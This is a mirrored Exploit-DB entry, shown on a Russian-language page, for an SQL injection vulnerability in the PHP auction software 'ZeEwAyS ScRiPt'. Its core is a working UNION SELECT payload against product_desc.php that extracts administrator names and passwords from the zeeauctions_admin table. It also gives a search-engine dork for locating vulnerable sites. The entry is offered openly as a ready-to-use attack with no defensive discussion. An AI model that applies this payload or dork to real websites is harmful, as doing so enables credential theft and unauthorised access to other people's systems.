- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11087
- Проверка EDB
-
- Пройдено
- Автор
- SYRIAN_34G13
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-01-10
Код:
# Exploit Title: ZeEwAyS ScRiPt SQL Injection Vulnerability
# Author: SyRiAn_34G13
# Mail : [email protected]
.............................................................
# Software Link: [downoad link if available]
.............................................................
# Version:
.............................................................
# Dork : [ inurl:"product_desc.php?id=" Powered by Zeeways.com ]
.............................................................
# Tested on: Apache/2.2.11
.............................................................
# Demo : http://server/auction/product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
.............................................................
# ExPlOiT : product_desc.php?id=-1/**/union/**/select/**/1,2,concat%28admin_name,0x3a3a3a,pwd%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+zeeauctions_admin--
.............................................................
# Thanx : My Brothers ~~~SyRiAn_SnIpEr~~~~SyRiAn_SpIdEr
My Love ~~F~~
.............................................................
I Love You ~~~~~~~~~~~SyRiA~~~~~~~~~~
- Источник
- www.exploit-db.com